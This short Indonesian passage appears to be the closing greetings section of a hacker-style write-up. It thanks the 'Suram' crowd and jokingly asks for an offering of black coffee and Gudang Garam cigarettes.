[+] Semua kaum Suram dimanapun berada yang tidak bisa disebukan satu persatu


[ NOTE ]

[+] Tolong kasih saya sesaji berupa Kopi Item dan rokok Gudang Garam
International
|